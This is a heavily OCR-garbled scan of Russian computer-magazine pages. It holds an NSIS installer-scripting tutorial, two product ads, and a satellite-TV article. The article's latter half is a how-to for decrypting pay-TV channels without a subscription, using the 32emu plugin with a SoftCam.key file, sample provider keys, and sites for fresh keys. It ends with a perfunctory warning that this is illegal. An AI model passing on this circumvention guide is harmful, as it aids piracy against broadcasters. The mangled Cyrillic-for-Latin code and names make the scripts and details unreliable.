ЗесІіопЕпсІ ;Конец секции 

Разобраться в этой писанине не составит 
труда ввиду подробных комментариев, но 



на одном моменте я остановлюсь под- 
робно. Путь к установочной директории 
указывается через системную переменную 
$РВОѲВАМРІІ_ЕЗ. Во время установки она 
автоматически заменится на СЛРгодгат 
РіІез\, где С:\ — метка системного диска. 
Бесспорно, удобная штука. К тому же спи- 
сок таких переменных довольно велик: 

$СОММСМРІІ_ЕЗ — разделяемые файлы 
(СЛРгодгат РіІез\Соттоп РіІез\); 

$ЕХЕйІВ — папка, из которой был запущен 
инсталлятор; 

$Ѵ\ШОІВ — корневой каталог ѴѴіпсІоѵѵз; 
$ЗУЗОІВ — системный каталог ѴѴіпсІоѵѵз; 
$ТЕМР — директория для хранения вре- 
менных файлов; 

$ЗТАВТМЕНІІ — каталог главного меню 
$ООСІІМЕНТЗ — каталог «Мои докумен- 
ты»; 

$РОИТЗ — каталог шрифтов. 

Теперь можно опробовать скрипт нашего 
инсталлятора в действии. Для этого нужно 
отдать команду на компиляцию. СігІ-РЭ 

— стандартный хоткей, актуальный как 
для НМ N13 ЕсІіІ, так и для стандартной 
ѲІІГшной оболочки МакеИЗІЗѴѴ. 

Дельные доработки 

Как ты понял, N313 предоставляет очень 
удобный способ, чтобы описывать как вне- 
шний вид инсталлятора, так и все его 
действия с помощью одного-единственно- 
го скрипта. Скрипт чаще всего состоит 
из нескольких секций, каждая из которых 
отвечает за некоторую часть устанавли- 
ваемой программы. Хотя в предыдущем 
примере нам пригодилась всего одна — 
необходимая для любого скрипта. В общем 
случае формат любой секции выглядит 
таким образом: 

Зесііоп [/о] [([!]1[-])Зесйоп_Мате] 

# некоторые команды 
ЗесйопЕпсІ 

Несложно догадаться, что ЗесІіоп_Иате 

— имя нашей секции. Если это имя отсутс- 
твует или перед ним стоит опциональный 
символ минуса «-», то у пользователя 
не будет возможности отменить установку 
компонента. Если же имя секции ‘ІІпіпзІаІГ 
или начинается с префикса ‘ип.’, то это сек- 
ция деинсталляции. Пример секции крайне 
прост: 

Зесйоп "ІІпіпзіаІІ" 

ОеІеІеВедКеуНКи\/І"ЗоЛѵѵаге\Місго8оЛ\ѴѴіпсІоѵѵ8\ 

СиггепІѴегзіоп\ІІпіп5ІаІІ\ЕхатрІе" 

ОеІеІеВедКеу НКІ_М ЗОРТѴѴАВЕ\ЫЗІЗ_ЕхатрІе 
йеіеіе $ІЫЗТ0ІРІ\ехатрІе.п5і 
йеіеіе $ІЫЗТ0ІРІ\ипіп5ІаІІ.ехе 
йеіеіе "$5МРВООВАМ5\ЕхатрІе\*.*" 

ВІѴЮіг "$ЗМРВООВАМ5\ЕхатрІе" 

ВІѴЮіг "$ІЫ5Т0ІВ" 

ЗесйопЕпсІ 

Думаю, здесь все понятно — вернемся 
к шаблону. Параметр /о делает секцию 
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Все программные продукты, упомянутые в этой 
статье, обязательно будут на диске. Хотя их без 
труда можно скачать из инета, размеры дистрибу- 
тивов поистине смехотворные. 



опциональной (то есть не отмеченной для 
установки по умолчанию), а знак «!» пропи- 
сывает ее жирным шрифтом. На практике 
все это выглядит вот так: 

Зесііоп «-скрытая секция» 

ЗесйопЕпсІ 

Зесііоп «# скрытая секция» 

ЗесйопЕпсІ 

Зесйоп «Іжирное выделение» 

ЗесйопЕпсІ 

Зесйоп /о «опциональная секция 
ЗесйопЕпсІ 

Кодерские заморочки 

Скрипты в N313 называются таковыми 
неспроста. Они предоставляют возмож- 
ность создавать переменные и функции, 
как и подобает любому языку программи- 
рования. Функции N313, подобно секциям, 
включают в себя отрывок кода, но отли- 
чаются от них возможностью вызова. Вот 
простейший пример: 

Рипсйоп кіпс 
# некоторые команды 
РипсйопЕпсІ 

Зесйоп 

;вызываем необходимую нам функцию из секции 
СаМ Типе 
ЗесІіопЕпсІ 

В качестве функции разумнее всего опре- 
делять код, который будет использоваться 
в нескольких секциях. Например, если мы 
пишем установщик новых плагинов для 
мультимедиа-плеера ѴѴіпатр, то их придет- 
ся поместить в каталог с предустановлен- 
ным плеером. А для этого нужно выполнить 
проверку: 

Рипсііоп .опѴегйуІпзЮіг 
ІТРМеЕхізІз $ІЫ5Т0ІВ\ѴѴіпатр.ехе РаІІіОоосі 
АЬогІ ; Каталог ѴѴіпатр выбран неверно. Не могу 
установить сюда! 

РаІІіОоосІ: 

РипсІіопЕпсІ 

Теперь пару слов о переменных. 
Объявляются они при помощи ключевого 
слова Ѵаг. Например, так: 

ѴагЫАМЕ 

Зесйоп ехатріе 

ЗІгСру $ЫАМЕ «ЗИасІОЗ» 

;Теперь можно использовать переменную 
; $ЫАМЕ, инициализированную строкой «ЗІіасЮЗ» 
ЗесйопЕпсІ 

Во время разработки скриптов тебе обя- 
зательно понадобятся метки, вызывае- 
мые инструкцией доіо. Они существуют 
двух видов: относительные и абсолютные. 
Абсолютные — обычные, как и в любом 
другом языке программирования, объяв- 
ляются так: 

МуІ_аЬеІ: 
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УР-Р2 



представьте... новая форма музыки 

Рок. Рэп. Кантри. Джаз. Какую бы музыку Вы 
ни слушали, с новым Затзипд УР-Р2 Вы всегда 
на пике моды. Этот компактный МРЗ-плеер 
выглядит как изящное украшение. Где бы Вы 
ни оказались, любимая музыка всегда с Вами. 
С УР-Р2 это так легко представить. 

трЗ. затзипд. ги 






Единая служба поддержки: 8-800-200-0-400. 



Галерея Затзипд: г. Москва, ул. Тверская, д. 9/17, стр. 1. ѵѵѵѵѵѵ.затзипд.ги; трЗ. затзипд. ги. Товар сертифицирован. 





Я нашел баг! Суть глюка в следующем: 
на момент написания мной статьи ис- 
пользовался N318 версии 2.16, но в со- 
зданном им инсталляторе отображает- 
ся версия 2.1 1 . 



Относительные же позволяют нам прыгать 
на несколько инструкций вперед или назад 
следующим образом: 

МеззадеВох МВ_УЕЗЫО «Вы желаете сохра- 
нить настройки программы?» ЮЫО +3 
Оеіеіе $ІЫЗТ0ІВ\ехатрІе.іпі 
ВІѴЮіг ЗІЫЗТОІВ 

МеззадеВох МВ_ОК «Удаление успешно завер- 
шено.» 

Если пользователь нажмет «Ыо», то выпол- 
нение скрипта перескочит на две инструк- 
ции вперед, и программа сообщит пользо- 
вателю о том, что она успешно справилась 
с поставленной задачей. 

Вообще, этих средств уже достаточно, 
чтобы написать хороший инсталлятор. Наш 
самый первый проект можно существенно 
улучшить, добавив ему функциональности. 
Но мы не будем публиковать его код. Во- 
первых, теперь тебе по силам написать 
скрипт самому. А во-вторых, ты найдешь 
его исходники на диске, и дублировать 
информацию в журнале смысла нет 

Легко или сложно — выбирай сам 

Во всех этих возможностях N313 можно 
запутаться, а можно умело пустить их в 
дело. Для тех, кто уже успел погрязнуть 
в пучине непоняток или слишком ленив, 
чтобы изучать новый язык, есть отлич- 
ный помощник — МіІіоѵ N313 Неірег. Это 
— программа-оболочка для N313, кото- 
рая позволяет создать инсталляционный 
пакет, не вникая в подробности написа- 
ния скриптов. От тебя требуется указать 
пару-тройку параметров — что и куда 
ставить. А все остальное N313 Неірег 
сделает за тебя: тебе останется лишь 
скомпилировать полученный скрипт. 

И все-таки я рекомендую, хотя и более 
геморройный, но зато более эффектив- 
ный путь — разработку скриптов вручную. 
В процессе написания статьи я настолько 
увлекся, что ненароком наколбасил на 
скриптах N313 вирус. Он, правда, пока 
кривой, но очень злобный. Дерзай :). зс 




Завершающее окно с логом работы 




НМ N13 ЕсШ — редактор скриптов N318 
подсветкой синтаксиса 
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Ответ Місгозоіі’а 

Естественно, компания Місгозоіі не могла оставить 
без внимания поле деятельности подобного продукта 
и тоже сделала свой вклад в развитие бесплатных 
инсталляционных пакетов. Исходник ѴѴіпсІоѵѵз ІпзіаІІег 
ХМІ_ (ѴѴіХ), который по многим параметрам не уступает 
N313, давно доступен на зоигсеіогае.пеі . Единственный 
минус в том, что пакет в обязательном порядке требует 
наличия на компьютере ^ЕТ Ргатеѵѵогк, который 
установлен пока не у всех. В качестве базового формата 
скриптов для инсталлятора ѴѴіХ использует язык ХМІ_. 
Может, это и плюс, но, по-моему, писать скрипты 
для N313 намного удобнее. Вот простейший скрипт 
ѴѴіХ, который создаст инсталлятор с возможностью 
установки/удаления, копирующий файл геасіте.іхі в 
папку «СЛРгодгат РіІезѴГезІ Ргодгат»: 

<?хтІ ѵег5іоп=’1.0’?> 

<ѴѴіх хтІпз=’ІіПр://5СІіета5.тісгозоЛ.сот/ѵѵіх/2003/01 /\л/і’> 
<РгосІисІ ІсІ=’1 2345678-1 234-1 234-1 234-1 2345678901 2’ 
Ыате=’Те51 Раскаде’ І_апдиаде=’1033’ Ѵегзіоп=’1 .0.0.0’ 
МапиІасІигег=’МісгозоІІ СогрогаІіоп’> 

<Раскаде ІсІ=’1 2345678-1 234-1 234-1234-12345678901 2’ 
0езспр1юп=’Му Іігзі ѴѴіпсІоѵѵз ІпзіаІІег раскаде’ Соттеп15=’ТЫз 
із ту Іігзі аііетрі аі сгеаііпд а ѴѴіпсІоѵѵз ІпзіаІІег сІаІаЬазе’ 
МапиІасІигег=’МісгозоІІ Согрогаііоп’ ІпзІаІІегѴегзіоп=’200’ 
СотргеззесІ=’уе5’ /> 

<МесІіа ІсІ=Т СаЬіпеІ=’ргосІис1.саЬ’ ЕтЬесЮаЬ=’уез’ /> 
<йігесІогу ІсІ=ТАРОЕТОІР’ Ыате=’ЗоигсеОіг’> 

<ЭігесІогу ІсІ=’РгодгагпРіІезРоІсІег’ Ыате=’РРіІе5’> 

<йігесІогу ІсІ=’МуОіг’ Мате=’ТезІРгод’ І_опдМате=’Те5І 
Ргодгат’> 

сСотропепІ ІсІ=’МуСотропепІ’ ѲиісІ=’1 2345678-1 234-1 234- 
1234-1 2345678901 2’> 



<РіІе ІсІ=’геасІте’ Ыате=’геас1те.1хГ 0ізкІсІ=Т згс=’геасІте. 
Іхі’ /> 

</СотропепІ> 

<ЮігесІогу> 

<ЮігесІогу> 

<ЮігесІогу> 

<РеаІиге ІсІ=’МуРеаІиге’ ТіІІе=’Му 1 зі Реаіиге’ І_еѵеІ=’1’> 
<СотропепІВеІ ІсІ=’МуСотропепІ’ /> 

</РеаІиге> 

</РгосІисІ> 

</ѴѴіх> 

Не очень, да? Тем более, что при компиляции скрипта 
N313 мы уже получаем готовый инсталлятор с именем 
ехатріе.ехе, а в случае с ѴѴіХ только — промежуточный 
объектный файл. Преимущества N313 очевидны. 





гі 

ННр://5оигсеІогае.пеІ/ 

— на этом славном 
портале ты найдешь 
разные прибамбасы 
для N813 

НИр://пзіз.зоигсе- 
Іогае.пеі — офици- 
альная страница про- 
екта N813 

И11р://ѵѵѵѵѵѵ.рзепіса. 
сот/пзіз/ — сайт 
программы МіРіоѵ 
N313 Неіоег. 
НІІр://уѵіх.зоигсеІогае. 
пеі/ 

— страница прямо- 
го конкурента N818 

— ѴѴіпсІоѵѵз ІпзіаІІег 
ХМІ- Іооізеі 
ЫІр://Іітпе.зоигсе- 
Іогае.пеі/ — редак- 
тор скриптов НМ N13 
Есііі 
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Н а меня тогда вышла одна юная журналистка. 

И сказала, делаем о тебе репортаж - ты надежда 
русского скейтбординга! Я, представляешь? 
Только, говорит, срочно: номер сдаем! А у меня 
лицо тогда было - ну, экологическая катастрофа! Всё 
в прыщах! 

И вдруг вижу в магазине новый лосьон СІеагазіІ ШТРА. 
Написано, видимый результат за три дня... Я попробовал. 
Правда помогает!! Статья, конечно, та еще получилась, 
в журналистике эта девушка понимает больше, чем 
в досках, переврала половину! Но фотки - никакого 
фотошопа, супер! 




ОШШвО, 

“ШШШГ 

КОЖА 
ЗАМЕТНО 
ЧИЩЕ ЗА 

-■дня 

”1 



ѵѵѵѵѵѵ. сіеагазі I . ги 
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Необходимые девайсы 

Сегодня мы не будем показывать чудеса 
паркура, бегая по крыше и настраивая 
спутниковую тарелку. Мы займемся 
программной частью вопроса и невзначай 
вскроем пару-тройку закрытых каналов. А 
о том, как правильно установить антенну, 
настроить ее на спутник и подружить меж- 
ду собой сопутствующее оборудование, 
мы уже рассказывали (помнится, в марте 
2005-го была подробная статья «Небес- 
ные радости»). Повторяться не буду. 

Но для полноты картины напомню, какие 
девайсы и для чего нужны. Итак, вся систе- 
ма для приема спутникового ТВ состоит из 
трех компонентов: антенны, конвертеров 
и ЭѴВ-карты. Тарелка отражает сигнал 
со спутника и благодаря своей форме 
аккумулирует его в одну точку. Установ- 
ленный в этой точке конвертер считывает 
цифровой поток и по проводам передает 
его ЭѴВ-карте. Ата, в свою очередь, 
переводит его в понятный для компьютера 
вид. Цена комплекта сильно зависит от 
диаметра антенны. Если отечественный 
«Супрал» с диаметром 1 ,2 метра стоит 
порядка восьмидесяти долларов, то ана- 
логичная 90-санти- 
метровая тарелка 
будет стоить в два 
раза дешевле. Пра- 
вило тут простое: 
чем больше, тем 
лучше. Но, в любом 
случае, даже на 
90-сантиметровую 
антенну в Москве 
можно вполне 
успешно прини- 
мать все основные 



каналы. Конвертер нужен линейной 
поляризации. Стоиттакой примерно 
$1 0. Что касается ОѴВ-карты, то самым 
демократичным вариантом является 
ЗкузІагО 2. При небольшой цене (всего 
$80 — 90) карта отлично справляется 
со своими задачами. Главное, чтобы 
компьютер был не десятилетней давности, 
поскольку обработка цифрового потока 
осуществляется на программном уровне. 
Таким образом, получаем $130 — 170 за 
весь комплект, который несложно и очень 
интересно настроить самому (читай выше 
упомянутую статью). 



Не все спутники одинаково 
полезны 

Теперь несколько слов о телевизионных 
спутниках. Все они находятся на так 
называемой геостационарной орбите. Это 
значит, что, вращаясь на орбите с угловой 
скоростью Земли, они всегда остаются 
в одной и той же точке относительно 
земной поверхности. Таким образом, 
единожды «нацелив» тарелку, тебе 
больше не придется бегать и настраивать 
ее. Но возникает вопрос: куда целится? 
Действительно, геостационарную орбиту 
делят между собой множество спутников. 

И далеко не все из них могут тебя заин- 
тересовать. Вообще говоря, сам спутник 
ничего не принимает и не передает — это 
делают специально установленные на нем 
устройства. Речь идет о транспондерах (о - 
английского ІгапзтіПег-гезропсІег — пере- 
датчик-ответчик). На телевизионном спут- 
нике обычно установлены десятки транс- 
пондеров, каждый из которых вещает свой 
пакет каналов. Зона покрытия (местность 
на которую осуществляется передача) и 
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ОПАСНО! 

РЕАЛИЗОВАВ ПОЛУЧЕН- 
НЫЕ ЗНАНИЯ НА ПРАКТИ- 
КЕ, ТЫ СЕРЬЕЗНО РИС- 
КУЕШЬ ОСТАТЬСЯ ЭТИМ 
ЛЕТОМ БЕЗ ЗАГАРА. ВСЕ 
СВОБОДНОЕ ВРЕМЯ БУ- 
ДЕШЬ ПРОВОДИТЬ ДОМА 
И, ЧТО ХУЖЕ ВСЕГО, 
НИЧЕГО НЕ СМОЖЕШЬ С 
ЭТИМ ПОДЕЛАТЬ. ДАЖЕ 
НЕСМОТРЯ НА ПОЛНОЕ 
ПОНИМАНИЕ ТОГО, ЧТО 
ПРИЧИНА КРОЕТСЯ В 
НЕДАВНО НАСТРОЕН- 
НОМ СПУТНИКОВОМ 
ТЕЛЕВИДЕНИИ. ТЫ ВСЕ 
ЕЩЕ ХОЧЕШЬ ЧИТАТЬ ЭТУ 
СТАТЬЮ? 
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мощность сигнала у каждого транспонде- 
ра может сильно отличаться, поэтому не 
исключена ситуация, когда одни каналы 
со спутника будут приниматься с большим 
запасом надежности, а другим, напротив, 
не будет хватать сигнала для непрерывной 
и качественной картинки. Информация о 
спутниках и их транспондерах доступна 
на многочисленных сайтах. Наиболее 
известной и ежедневно обновляющейся 
базой данных является проект І_упдЗаІ 
( ѵѵѵѵѵѵ.іѵпазаі.сот ). Для центральной части 
России наиболее лакомым является по- 
зиция 1 3.0°Е геостационарной орбиты. В 
этой точке летают сразу 5 телевизионных 
спутников — НоіВігб 1/2/3/6/7А. Начинать 
эксперименты рекомендую именно с 
«Жар-птицы». 

Определяемся с софтом 

Теперь, когда все предполетные подго- 
товки и разъяснения завершены, можно 
приступить к тому, что, собственно говоря, 
на сегодня запланировано — к настройке 
софта. Программ для просмотра спутнико- 
вого телевидения немало, причем можно 
выделить, по крайней мере, три конкури- 
рующих продукта с примерно одинаковым 
набором функций: РгодОѴВ ( ѵѵѵѵѵѵ.ргоабѵЬ. 
сот/гиз У МуТИеаІге ( ѵѵѵѵѵѵ.бѵЬсоге.сот У 
АІГОѴВ ( ѵѵѵѵѵѵ.аІІбѵЬ.го У Лучше всего, на мой 
взгляд, начинать с РгодОѴВ. Программа 
впечатляюще функциональна, но в то же 
время крайне проста в освоении, бесплатна 
и даже имеет интерфейс на русском языке. 
К тому же большинство пользователей от- 
дают предпочтение именно ей , и этот факт 
уже о многом говорит. Два других продукта, 
безусловно, тоже заслуживают внимания, 
но требуют больше усилий для настройки. 

В случае же с РгодОѴВ проблемы исключе- 
ны в принципе. Закачав небольшой дистри- 
бутив с официального сайта, можешь сразу 
же приступать к установке. Разберем эту 
процедуру по шагам, в той последователь- 
ности, которую предлагает инсталл-мастер: 

1 . На первом шаге выбираем язык интер- 
фейса. Подсказки, думаю, не нужны. 

2 . Далее из выпадающего меню выбери 
свою ОѴВ-карту. Если ты последовал 
моему совету и купил 5куз1аг2, то так и ука- 
зывай — «ТесИпізаІ 5ку5іаг2 или ЗкуЗіагЗ 
(РСІ/ІІЗВ)». После этого активируй две до- 
ступные опции, которые зарегистрируют 
необходимые кодеки в системе, и в случае 
необходимости измени директорию для 
инсталляции. 

3. На следующем шаге будет предложено 
настроить функцию ІітезИіЙ’а, позволя- 



ющую сохранить непродолжительный 
отрывок видео в памяти, и в случае 
необходимости как бы немного отмотать 
трансляцию назад. Ты можешь настроить 
эту функцию позже, дав мастеру ответ 
«Не использовать». Или прямо сейчас 
указать месторасположение файла для 
записи ІітезИіЙ’а, а также дисковую квоту, 
на которую он сможет рассчитывать. 

4 . Последний этап — выбор модулей 
для установки. По умолчанию указан 
оптимальный набор, так что смело жми 
«Далее» и жди окончания установки. 

Есть, правда, один нюанс. В отличие от 
программы МуТИеаІге, построенной на 
движке ОѴВсоге, для полноценной работы 
РгодОѴВ нуждается в дополнительной 
утилите. Но не в каком-то там стороннем 
продукте от сомнительных разработчи- 
ков. Нет, речь идет о программе Зе1ир4РС, 
которая поставляется с картами Зкуз1аг2 
по умолчанию. Скорее всего, ты устано- 
вил ее во время инсталляции драйверов, 
но если все-таки этого не сделал, то 
приступай сейчас. Если ты не использу- 
ешь мотоподвес или мультифид (смотри 
глоссарий), то трогать ее не обязательно. 
Лучше вообще удали ее из автозагрузки, 
чтобы не мешалась. 

Первый запуск 

Далее можно приступать к запуску прило- 
жения. Спешу тебя огорчить: вот так сразу 
взять и насладиться мировыми каналами 
в ОѴО-качествеутебя не получится. 

Думать об этом пока рано, так что готовься 
еще немного помучиться. Первым делом 
отправляйся в настройки программы 
(меню «Настройки -> Опции»), где сразу 
же отключи многопроцессорность. Делать 
это, естественно, нужно только в том 
случае, когда в системе установлен один 
процессор. Затем приступай к настройкам 
так называемого ОіЗЕцС (меню « Настрой- 
ки -> ОІЗЕцС»). Непонятная аббревиатура 
представляет собой протокол для управ- 
ления конвертерами и прочими внешними 
устройствами. С его помощью можно 
наладить совместное использование не- 
скольких антенн или позиционера. Так как 
ни с чем подобным мы пока не связываем- 
ся и обходимся минимальным набором для 
ЗАТ-ТѴ, то трудностей с настройкой здесь 
возникнуть не должно. Смело выставляй 
значение «Один конвертер» и щелкай по 
появившемуся зеленому кружку. Должно 
открыться окно параметров облучателя, 
изобилующее различными опциями и 
настройками. Единственная твоя задача 



здесь — поменять значение «Позиции» 
на название текущего спутника, то есть в 
нашем случае — на НоіВігб 1,2,3, 4, 5. В 
будущем, когда созреешь до использо- 
вания дополнительного оборудования, с 
этими настройками придется повозиться. 
Но сейчас нас это интересует мало. 
Вообще, настройка ОІЗЕцС нужна для 
того, чтобы программа знала, с какими 
транспондерами ей придется работать. 
Каждый из них имеет три параметра: час- 
тоту, поляризацию и скорость потока. В 
кратком виде это записывается примерно 
так: 1 1 075 ѵ 27500 (ѵ — вертикальная 
поляризация, И — горизонтальная). Чтобы 
принимать данные с транспондера, ОѴВ- 
карта должна определенным образом 
настроиться, инициализировавшись с 
помощью этих параметров. 

В базе РгодОѴВ заложена информация 
о каждом спутнике и его транспондерах. 

И теперь, когда мы настроили программу 
для работы с НоіВігсІ, можно последова- 
тельно просканировать все транспондеры 
и составить список каналов, вещающих 
с каждого из них. Для этого выбираем в 
меню пункт «Список каналов -> НоіВігс1 1 , 
2, 3, 4, 5» . Если на экране начнут бежать 
различные цифры, то можно считать, что 
жизнь удалась. Значит, мы настроили все 
правильно, и сейчас РгодОѴВ после- 
довательно настраивается на каждый 
транспондер из своей базы данных. В 
окне будет отображаться следующая 
информация: 

• Название спутника. 

• Частота транспондера, сканируемого в 
данный момент, его символьная скорость, 
а также поляризация. 

• Качество сигнала. 

•Уровень сигнала. 







Хороший канал . Днем показываютсвежие 
фильмы и мультики, ночью — порнуху. 
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Товар сертифицирован 




Т ихо! Идет сканирование транспондеров. 



Настройки эмулятора 82ети, не забудь про важные опции! 



Помнишь, я тебе говорил, что уровень сиг- 
нала для них может различаться? Т еперь 
можешь в этом убедиться, наблюдая за 
разницей в сигнале для разных транс- 
пондеров. Кстати говоря, стопроцентный 
сигнал отнюдь не обязателен для качес- 
твенного приема — 30% вполне доста- 
точно. Хотя разумно иметь некоторый 
запас, поскольку при любом ухудшении 
погодных условий уровень приема сильно 
снизится. 

Как только процесс поиска будет завер- 
шен, в левой части программы обозна- 
чатся заветные названия каналов — МТѴ, 
Оізсоѵегу, а также названия прочей теле- 
визионной лабуды. Все найденные каналы 
будут иметь различные обозначения: 

V - некодированные ТВ-каналы; 

V - кодированные ТВ-каналы; 

В - некодированные радиоканалы; 

В - кодированное радио. 



Помимо этого будут присутствовать 
каналы данных, используемые провай- 
дерами спутникового интернета и других 
сервисов, — они обозначены значками в 
виде дискеты. Нам они только мешают, так 
как ухудшают навигацию. Чтобы отфиль- 
тровать этот мусор, достаточно перейти в 
свойства каналов (меню «Список каналов 
-> Свойства») и снять чекбоксы с «Другое». 

Неполная радость 

Программа настроена, транспондеры 
просканированы — пора бы насладиться 
результатами проделанной работы. Для 
этого щелкни по названию какого-нибудь 
открытого канала и жди секунду-другую. 
Очень скоро в правой части окна появится 
изображение. При желании просмотр 
можно тутже развернуть на весь экран, 
дважды щелкнув по картинке. . . 

Однако очень скоро окажется, что боль- 
шинство открытых каналов почему-то 



рекламные, технические или на каком-то 
непонятном арабском языке. В то время 
как приятные глазу названия — Оізсоѵегу, 
Еигозрогі, ВВС — почему-то помечены 
красным флажком, то есть кодированы, 
и просматривать себя, эдакие негодяи, 
просто так не дают. Щелкаешь по ним, а 
толку никакого. Ситуация вполне обычная 
Хорошие каналы с интересными переда- 
чами и свежими фильмами, как правило, 
входят в состав платных пакетов. Купил 
официальную карту — смотри, а если 
платить не хочешь, то довольствуйся от- 
крытыми альтернативами. Карта доступа 
вставляется в специальный картопри- 
емник. У ОѴВ-карточки его нет, поэтому 
его заменяет специальный Сі-модуль или 
программатор. Один и другой докупаются 
дополнительно, а нам, сам понимаешь, 
такие расходы не нужны. 

Открою тебе небольшой секрет. Сущес- 
твует способы так называемого «хитрого 
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Дружно говорим «спасибо» тем, кто обновляет клю- 
чи в зойсат.кеу 

просмотра», когда закрытые каналы открывают- 
ся без официальной карты доступа. Основных 
подходов тут два: 

1 . Просмотр осуществляется с помощью подде- 
льной карты доступа, обычно представляющей 
собой точную копию официальной карточки. 

При умении ее можно изготовить самому или 
же купить у барыг на рынке. Вставляется все в 
тотжеСі-модульили программатор, которого у 
нас как не было, так и нет. Поэтому этот вариант 
отпадает. 

2. Декодирование канала осуществляется 
специальными программными средствами, ко- 
торые подключаются к утилитам для просмотра 
спутникового ТВ в виде плагинов. Эмулируя 
аппаратный декодер, они позволяют просмат- 
ривать закрытые каналы в случае, когда для них 
известен ключ доступа. Максимум отдачи при 
полном отсутствии дополнительного оборудова- 
ния. Однако существенный недостаток состоит 
в том, что хитрые аддоны работают, только 
если скрыт алгоритм кодирования (то есть они 
могут эмулировать работу декодера), а также 
известен ключ доступа. Эти условия выполнимы 
далеко не всегда, и именно по этой причине 
часть кодировок давно доступна для просмотра, 
а другая — по-прежнему не боится пиратов. 

Программные эмуляторы 

Очевидно, что в нашем случае подходит только вто- 
рой вариант. Все, что потребуется для просмотра 
закрытых каналов, — это подключить к РгодЭѴВ 
специальный плагин и периодически обновлять 
заветные ключики. Г ением программерской 
мысли было разработано довольно много 
работающих эмуляторов, но мы остановимся на 
наиболее популярных из них: 

Уапкзе — отличный плагин, который может 
открывать такие кодировки, как Ѵіассез-1 , 
Ѵіассезз-2, ТРЗСгурІ, Зеса-1 , Зеса-2, Ігбеіо-І , 
Веіа-І , ІМадгаѵізіоп, Сопах. Сейчас, впрочем, сдал 
позиции и значительно уступает другому эмулятору 
— 32ети. 

32ети — это самый популярный эмулятор на 
сегодняшний день. Мастерски эмулируя декоди- 
рующие устройства, он в легкую открывает все 
взломанные кодировки, а это: ѴІАССЕЗЗ, ЗНІ_, 
ЗЕСА, ЗЕСА2, ІЧадга, Сопах, Суіга, Сгуріоѵѵогкз и 
многие другие. 

ЗпіІсН — это плагин, который славится тем, что вы- 
дирает ключи для кодировки ІМадгаѵізіоп прямо из 
потока. Он был востребован ровно до тех пор, пока 
в 32ети не появилась аналогичная опция. 

Сарі — эмулятор, активно применяющийся для 
просмотра популярных каналов в кодировке Суіга. 
Сейчас его функции с доблестью выполняет все 
тот же 32ети. 

Думаю, тебе уже ясно, что мучиться с выбором 
чудесного дополнения не придется. Плагин 32ети 
умеет все, поэтому на нем и остановимся. Распро- 
страняется он в виде обычного архива, который 
нужно распаковать в каталог РгодЭѴВ/РІидіпз 
(кстати говоря, другие плагины инсталлятся ана- 



логичным способом). Сразу после этого в пункте 
меню «Плагины» появится новый пункт — 32 Ети. 

Ключ от всех дверей 

Справедливости ради стоит заметить, что для 
полноценной работы одного только плагина недо- 
статочно. Если ты запустишь РгодЭѴВ, то она тут 
же начнет ругаться на отсутствие файла ЗоШЗат. 
кеу. В нем содержится информация о провайдерах, 
каналах, кодировках и действующих ключах, необ- 
ходимых для декодирования цифрового потока. По 
сути, это обычный текстовый файл, который имеет 
следующий формат: 

А ВВВВ СС □□□□□□□□□□□□□□□□; 



Г де: А — имя кодировки, состоит из одной 
буквы (может использоваться N — ІМадгаѵізіоп, V 
— Ѵіассезз, 3 — Зеса, I — Ігбеіо, К — СгурІоѴѴогкз, 
СилиХ — Сопах). В-уникальный идентификатор 
провайдера, состоит от двух и более цифр . С — но- 
мер ключа, состоящий из двух цифр. Э — непос- 
редственно сам ключ в шестнадцатеричном виде. 
Все, что следует за точкой с запятой, считается 
комментарием, и плагинами не обрабатывается. 

На практике это выглядит примерно так: 

N 4201 01 690СР5833947Е9ВС ;ТѴЕАтегісаЗОѴѴ 
N 4301 00 79Е93Р290ЕВР550А ;ТѴЕ Атегіса ЗОѴѴ 

Провайдеры периодически изменяют ключи, 
поэтому нужно постоянно отслеживать их актуаль- 
ность. Существуют специальные сайты, на которых 
выкладываются обновленные ключики, но вручную 
править ЗойСат.кеу неудобно. Г ораздо быстрее 
закачивать готовые файлы с ключами, которые 
чуть ли не ежедневно выкладывают на специали- 
зированных сайтах. Обычно они представляют 
собой сайты-аплоады, на которые каждый может 
заливать файлы. Поэтому будь осторожен, чтобы 
среди ЗойСапгГов и обновленных версий 32ети не 
подцепить какую-нибудь заразу. Поместить свеже- 
нький ЗоЮат.кеу следует в папке с 32ети. 
Настройки плагина хранятся в файле 32ети.іпі, но 
править вручную ничего не придется. Чтобы акти- 
вировать все его возможности, необходимо через 
меню РгодЭѴВ выбрать пункт «Плагины -> 32Ети» 
и везде, где возможно, поставить галочки — так, 
как это сделано на скриншоте. 

Уже после этого можно начинать радоваться. 
Попробуй включить какой-нибудь закрытый канал: 
скажем, «МТѴР» наНоіЬігсГе. Если ты сделал 
все правильно, то в правой части окна появится 
картинка, а из динамиков ты услышишь приятную 
музыку МТѴ. Канал взломан! Если вменю32ети 
выберешь пункт ІпТо, то получишь полную инфу о 
трансляции. В будущем, когда каналы один за дру- 
гим будут отказываться работать, тебе частенько 
придется обращаться к этому информационному 
окну, чтобы разобраться, в чем причина. Благо 
32ети всегда объяснит, почему не может вскрыть 
поток данных. Воту меня, например, сейчас уста- 
рел ЗойСаіл. кеу 

Будь благоразумен 

В завершение хочу предупредить тебя, что непра- 
вомерный просмотр закрытых каналов является 
противозаконным действием. Используй получен- 
ные знания на свой страх и риск. Особенно тебя 
прошу: не пытайся искать проблем на свою задницу 
и использовать информацию для получения коммер- 
ческой прибыли. Едва ли кто-то обидится, если дома 
ты установишь плагин 32ети и будешь взламывать 
иностранные пакеты. Но вот если ты начнешь брать 
за это деньги, то имеешь все шансы попасть в поле 
зрения компетентных органов, зс 
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Актюатор — специальный 
электродвигатель, позициони- 
рующий антенну. 

Позиционер — девайс, кото- 
рый управляет актюатором. 
Полярная подвеска — спе- 
циальная подвеска антенны, 
позволяющая юстировать ее 
на спутник простым поворотом 
вправо-влево. 

Мультифид — прием, 
позволяющий использовать не- 
сколько конвертеров на одной 
тарелке 

ОѴВ (ОідііаІ Ѵісіео 
Вгоасісазііпд) — открытый 
стандарт передачи цифрового 
видео, обеспечивающий отмен- 
ное качество трансляции. Для 
спутниковых систем выделяют 
отдельный стандарт — ЭѴВ-3 
ОіЗЕцС (ОідііаІ ЗаіеІІііе 
Едиіртепі Сопігоі) — группа 
протоколов взаимодействия 
ЭѴВ-устройств с внешними 
девайсами. Существуют 
несколько версий ЭіЗедС — 1 .X, 
2.Х, ЗХ, но все они имеют общее 
предназначение, отличаясь по 
функциональности. 
Управляющие сигналы 
— особым образом составлен- 
ные сообщения ЭѴВ-карты, 
предназначенные для управле- 
ния внешними устройствами. 
